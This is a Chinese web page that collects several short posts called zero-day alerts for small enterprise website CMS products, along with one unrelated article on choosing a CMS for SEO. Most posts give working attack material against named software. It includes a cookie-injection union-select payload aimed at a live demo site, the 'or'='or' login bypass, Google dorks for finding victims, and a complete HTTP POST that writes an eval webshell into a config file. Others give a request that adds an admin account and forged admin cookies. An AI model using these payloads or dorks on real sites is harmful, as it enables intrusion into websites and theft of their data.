启航通信企业建站CMS系统v1.1 0day漏洞预警

时间:2023年02月02日

/

来源:OliviaKang

/

编辑:本站小编

收藏本文

下载本文

以下是小编为大家准备的启航通信企业建站CMS系统v1.1 0day漏洞预警,本文共9篇,供大家参考借鉴,希望可以帮助到有需要的朋友。本文原稿由网友“OliviaKang”提供。

篇1:启航通信企业建站CMS系统v1.1 0day漏洞预警

这是一套破系统,拿人家源马改改就说是自己的,还收费

垃圾系统,还对源马进行了加密,

漏洞一大堆

后台登录验证文件:

<%

dim sql,rs

dim username,password,CheckCode

username=replace(trim(request(“username”)),“'”,“”)

password=replace(trim(Request(“password”)),“'”,“”)

CheckCode=replace(trim(Request(“CheckCode”)),“'”,“”)

上面加载的页面中居然没有加载防注入的,

而且接收参数居然用request。并没有限制,各种注入一起上吧

2、前台页面存在注入

%owen=request(“id”)%>

<%

id=cstr(request(“id”))

Set rsnews=Server.CreateObject(“ADODB.RecordSet”)

sql=“update news set hits=hits+1 where id=”&id

conn.execute sql

可以利用注入中转。其它页面我就没看了。

接下来看后台拿shell的漏洞吧

1、上传漏洞,可以有明小子上传。

2、数据库备份,没做任何限制。上传图片马,然后进行备份

3、网站配置,可插入闭合式一句话拿shell

对于这样的企业站。。。。我很无语。。

篇2:86cmsSP6 企业建站系统 0day漏洞预警

这个是比较无语的,跟之前发布出来的那套是一模一样的。。真不知道到底是谁在抄谁的

继续

直接利用就可以拿shell 了,

配置IIS6.0

关键词大家去找吧。。我不喜欢批量

篇3:启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警

by Mr.DzY

from www.0855.tv

由于网上开源的东西多了,版权就无从查起,这天姑且就这么称乎它吧。

具体版权无从查知,相似的内核太多。

源码下载:www.mycodes.net/25/4628.htm

:www.tb11.net/

官方演示:www.tb11.net/system/xitong/

www.tb11.net/system/xitong2/

www.tb11.net/system/xitong3/

直接上exploit:

javascript.:alert(document.cookie=“id=”+escape(“1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin”));

test:www.tb11.net/system/xitong/shownews.asp?id=210

测试关键字自己找,

篇4:云起企业建站系统通杀oday漏洞预警

话说无聊去代码网站下套程序分析分析

可到了这个云起企业建站系统 下载数挺多的 于是乎看了起来

首先看到了它的后台login.asp文件,。一看 边觉得 。。。

if request.Form(“submit”)“” then

if request.Form(“userid”)=“” or request.Form(“password”)=“” then

response.Write(“”)

response.end

end if

set rs=conn.execute(“select * from gly where uid='”&trim(request.form(“userid”))&“' and pwd='”&trim(request.form(“password”))&“'”)

if rs.eof then

response.Write(“”)

response.End

else

if rs(“IsSuper”)=1 then

session(strSession&“uid”)=“s”

session(strSession&“uidn”)=rs(“id”)

else

session(strSession&“uid”)=“n”

session(strSession&“uidn”)=rs(“id”)

end if

response.Redirect(“index.asp”)

response.End()

end if

rs.close

set rs=nothing

end if

大家 看到没只用trim函数过滤了空格,

这样一来就直接出现了从客户端传递过来的数据,直接带入数据库查询了,这样我们就可以用'or'='or'登陆了

真是啊 。。什么年代了 还有这样的情况。。。

再来看看进去后台之后的上传文件。。

部分代码:

上传文件

<%=request.QueryString(“fm”)%>&em=<%=request.QueryString(“em”)%>“ name=”form1“>

我找了很久以为还是找错了上传文件 因为我没看到上传类型的过滤代码。。

但是 确定之后 就是这个文件 因此 继续。。。

那就是说没过滤任何文件了 直接可以传咯。。

实在不怎样 。。编辑器版本由原来的ewebeditor转换为FCKeditor

后台做了安全验证 FCKeditor利用不了的 但是往往程序员忽略了最重要的漏洞。。

google关键字:inurl:arti_show.asp?id=

后台地址:management/login.asp

万能密码登陆 'or'='or'

后台可以直接上传文件

篇5:TAYGOD免费企业建站系统漏洞 TAYGOD 0day漏洞预警

一 系统简介

TAYGOD免费企业建站系统是一款开源的免费程序,您可以

TAYGOD免费企业建站系统ASP版是一款基于asp+access的免费开源建站系统,整套系统的设计构造,完全考虑中小企业类网站的功能要求,网站后台功能强大,管理简捷,支持模板机制,能够快速建立您的企业网站。

系统特性:

采用流行的asp+access设计,功能强,实用性高。

代码美工完全分离,维护更方便。

对运行环境要求低,基本上一般的空间都支持此网站系统的运行。

完美整合KindEditor编辑器,所见所得发布各类图文信息。

后台操作简洁,无需专业知识,即可掌控整站。

风格模板机制简单,通过简单的HTML制作即可,后台提供完善的标签调用说明与示例。

后台数据库备份,您可以通过FTP工具将备案的数据库文件下载到您本地电脑中。

一:添加管理员XSS漏洞。

漏洞文件:\\source\\adminAdmin_Add.asp

漏洞代码:

<%if request.QueryString(“action”)=”save”thenuid=replace(trim(Request(“uid”)),”‘”,””)realname=replace(trim(Request(“realname”)),”‘”,”“)pwd1=replace(trim(Request(“pwd1″)),”‘”,””)pwd2=replace(trim(Request(“pwd2″)),”‘”,”“)password=md5(pwd1)

未进行验证直接写入数据,

漏洞测试:

127.0.0.1/asp/source/admin/Admin_Add.asp?action=save&uid=test&realname=test&pwd1=itlynn&pwd2=password

将生成一个用户名与密码为:123456 password 的管理员。

至于怎么欺骗管理员打开,这就需要一点社工技术了。

自己研究吧。

二:留言板XSS漏洞

漏洞文件:\\Message.asp

漏洞测试:在留言板页面插入XSS代码。

篇6:餐厅cms getshell漏洞漏洞预警

漏洞类型:代码执行

关键字:inurl:index.php?m=shopcar

问题出在/install/index.php文件,在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。

<?phpif(file_exists(”../install.lock“)){header(”Location: ../“);//没有退出}//echo 'tst';exit;require_once(”init.php“);if(empty($_REQUEST['step']) || $_REQUEST['step']==1){

可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。

1、getshell(很危险)

if(empty($_REQUEST['step']) || $_REQUEST['step']==1){$smarty->assign(”step“,1);$smarty->display(”index.html“);}elseif($_REQUEST['step']==2){$mysql_host=trim($_POST['mysql_host']);$mysql_user=trim($_POST['mysql_user']);$mysql_pwd=trim($_POST['mysql_pwd']);$mysql_db=trim($_POST['mysql_db']);$tblpre=trim($_POST['tblpre']);$domain==trim($_POST['domain']);$str=”<?php \\r\\n“;$str.='define(”MYSQL_HOST“,”'.$mysql_host.'“);'.”\\r\\n“;$str.='define(”MYSQL_USER“,”'.$mysql_user.'“);'.”\\r\\n“;$str.='define(”MYSQL_PWD“,”'.$mysql_pwd.'“);'.”\\r\\n“;$str.='define(”MYSQL_DB“,”'.$mysql_db.'“);'.”\\r\\n“;$str.='define(”MYSQL_CHARSET“,”GBK“);'.”\\r\\n“;$str.='define(”TABLE_PRE“,”'.$tblpre.'“);'.”\\r\\n“;$str.='define(”DOMAIN“,”'.$domain.'“);'.”\\r\\n“;$str.='define(”SKINS“,”default“);'.”\\r\\n“;$str.='?>';file_put_contents(”../config/config.inc.php“,$str);//将提交的数据写入php文件

上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马

-----------post----------

POST /canting/install/index.php?m=index&step=2 HTTP/1.1

Host: 192.168.80.129

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: 192.168.80.129/canting/install/index.php?step=1

Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42

Content-Type: application/x-www-form-urlencoded

Content-Length: 126

mysql_host=test”);@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD

---------post----------

但是这个方法很危险,将导致网站无法运行,

2、直接添加管理员

elseif($_REQUEST['step']==5){if($_POST){ require_once(“../config/config.inc.php”);$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);mysql_select_db(MYSQL_DB,$link);mysql_query(“SET NAMES ”.MYSQL_CHARSET );mysql_query(“SET sql_mode=''”);$adminname=trim($_POST['adminname']);$pwd1=trim($_POST['pwd1']);$pwd2=trim($_POST['pwd2']);if(empty($adminname)){echo “”;exit;}if(($pwd1!=$pwd2) or empty($pwd1)){echo “”;//这里也是没有退出}mysql_query(“insert into ”.TABLE_PRE.“admin(adminname,password,isfounder) values('$adminname','”.umd5($pwd1).“',1)”);//直接可以插入一个管理员}

这样的话我们就可以直接插入一个管理员帐号,语句如下:

POST /canting/install/index.php?m=index&step=5 HTTP/1.1

Host: 192.168.80.129

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: 192.168.80.129/canting/install/index.php?step=1

Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42

Content-Type: application/x-www-form-urlencoded

Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen

篇7:动力互联建站漏洞漏洞预警

简要描述:

UNCC动力互联建站存在多种高危漏洞,基本通杀所有程序,

(这次报个礼包求邀请码)

详细说明:

后台入口:

/manage/login.aspx

伪造cookie即可绕过登陆

[{ “domain”: “.xxx.com”, “expirationDate”: 1392975480, “hostOnly”: false, “httpOnly”: false, “name”: “AdminID”, “path”: “/”, “secure”: false, “session”: false, “storeId”: “0”, “value”: “1”},{ “domain”: “.xxx.com”, “expirationDate”: 1392975480, “hostOnly”: false, “httpOnly”: false, “name”: “AdminName”, “path”: “/”, “secure”: false, “session”: false, “storeId”: “0”, “value”: “admin”}]

爆管理员账户密码:

/manage/admins.aspx

任意文件下载/删除:

期刊下载-添加下载文档 (删除此条目会同时删掉所指向文件)​

SQL注入:

/manage/EditAdmin.aspx?ID=1'

/manage/EditAdmin.aspx?ID=1 and 1=1

漏洞证明:

修复方案:

过滤,验证

篇8:企业建站如何选择适合的CMS系统

一个好的CMS系统除了可以制作符合企业自身形象,美观大气的网站,还要注重其文章或内容在SEO方面的优化,从而提升网站的流量,

对用户友好

必须能够满足用户需求,取得用户信任。企业网站是用户获取企业信息的一个最重要的途径。企业用于网站建设的CMS系统其结构要合理,模板制作要简单,以最大程度的提高网站的用户体验度。

实现全站URL的静态化

企业建站要选择一个适合搜索引擎优化的CMS系统,必须选用一个生成纯静态页面的CMS系统来建设网站,有利于搜索引擎优化,提高网站排名。

采用DIV+CSS布局

DIV+CSS 是一种新的网页布局方法,这一种网页布局方法有别于传统的table布局,真正地达到了W3C内容与表现相分离的标准,

网站的面包屑式导航

通过使用文本链接的面包屑式导航来强化网站内部链接结构的层次性,同时这些链接富含关键字。方便用户站内浏览,了解当前所处位置,增强用户体验。

对网站管理者友好

适用于企业网站的CMS系统,其制作与管理须完全脱离代码执行,方便网站管理员更新维护。并且,模板制作简单,以方便网站管理者修改网站界面。

篇9:W78 CMS企业网站管理系统V2.8 0day漏洞预警

主要是后台编辑器上传漏洞,配合IIS6.0可以直接上传拿shell

以是上利用代码

很熟悉的漏洞了,

企业SEO专业网站漏洞及修复漏洞预警

魔方网络摄影系统注入漏洞及利用漏洞预警

南方数据网站管理系统注入漏洞&后台拿WebShell漏洞预警

下载启航通信企业建站CMS系统v1.1 0day漏洞预警(共9篇)
启航通信企业建站CMS系统v1.1 0day漏洞预警.doc
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档
最新范文更多
    热门文章
      猜你喜欢
      点击下载本文文档